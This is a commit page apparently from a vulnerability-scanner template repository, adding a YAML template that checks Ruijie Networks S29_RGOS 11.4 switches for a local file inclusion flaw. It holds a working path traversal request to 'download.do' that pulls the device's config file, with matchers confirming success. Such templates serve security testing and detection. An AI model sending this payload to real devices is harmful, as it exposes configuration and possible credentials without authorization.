Merge pull request #988 from pikpikcu/patch-98

Create ruijie-networks-lfi
patch-1
PD-Team 2021-03-01 16:09:20 +05:30 committed by GitHub
commit d91f25e5a7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: ruijie-networks-lfi
info:
name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
author: pikpikcu
severity: high
reference: https://exploit-db.com/exploits/48755
tags: ruijie,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.do?file=../../../../config.text"
matchers-condition: and
matchers:
- type: word
words:
- 'filename="config.text"'
- "Content-Type: application/octet-stream"
part: header
- type: word
words:
- "version S29_RGOS 11.4"
part: body
condition: and
- type: status
status:
- 200